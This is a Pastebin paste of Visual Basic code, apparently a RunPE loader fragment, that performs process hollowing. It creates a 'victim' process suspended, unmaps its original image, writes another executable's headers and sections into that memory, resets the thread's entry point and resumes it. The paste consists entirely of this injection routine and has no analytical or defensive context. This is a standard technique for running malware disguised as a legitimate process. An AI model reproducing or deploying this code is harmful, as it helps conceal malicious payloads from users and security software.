Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. If CreateProcess(vbNullString, sVictim, 0, 0, False, CREATE_SUSPENDED, 0, 0, si, pi) = 0 Then
  2.    MsgBox "Can not start victim process!", vbCritical
  3.    Exit Function
  4. End If
  5.  
  6. context.ContextFlags = CONTEXT86_INTEGER
  7. If GetThreadContext(pi.hThread, context) = 0 Then GoTo ClearProcess
  8.  
  9. Call ReadProcessMemory(pi.hProcess, ByVal context.Ebx + 8, addr, 4, 0)
  10. If addr = 0 Then GoTo ClearProcess
  11.  
  12. If ZwUnmapViewOfSection(pi.hProcess, addr) Then GoTo ClearProcess
  13.  
  14. ImageBase = VirtualAllocEx(pi.hProcess, ByVal inh.OptionalHeader.ImageBase, inh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
  15. If ImageBase = 0 Then GoTo ClearProcess
  16.  
  17. Call WriteProcessMemory(pi.hProcess, ByVal ImageBase, abExeFile(0), inh.OptionalHeader.SizeOfHeaders, ret)
  18. lOffset = idh.e_lfanew + Len(inh)
  19.  
  20. For i = 0 To inh.FileHeader.NumberOfSections - 1
  21.     CopyMemory ish, abExeFile(lOffset + i * Len(ish)), Len(ish)
  22.     Call WriteProcessMemory(pi.hProcess, ByVal ImageBase + ish.VirtualAddress, abExeFile(ish.PointerToRawData), ish.SizeOfRawData, ret)
  23.     Call VirtualProtectEx(pi.hProcess, ByVal ImageBase + ish.VirtualAddress, ish.VirtualSize, Protect(ish.characteristics), addr)
  24. Next i
  25.  
  26. Call WriteProcessMemory(pi.hProcess, ByVal context.Ebx + 8, ImageBase, 4, ret)
  27. context.Eax = ImageBase + inh.OptionalHeader.AddressOfEntryPoint
  28. Call SetThreadContext(pi.hThread, context)
  29. Call ResumeThread(pi.hThread)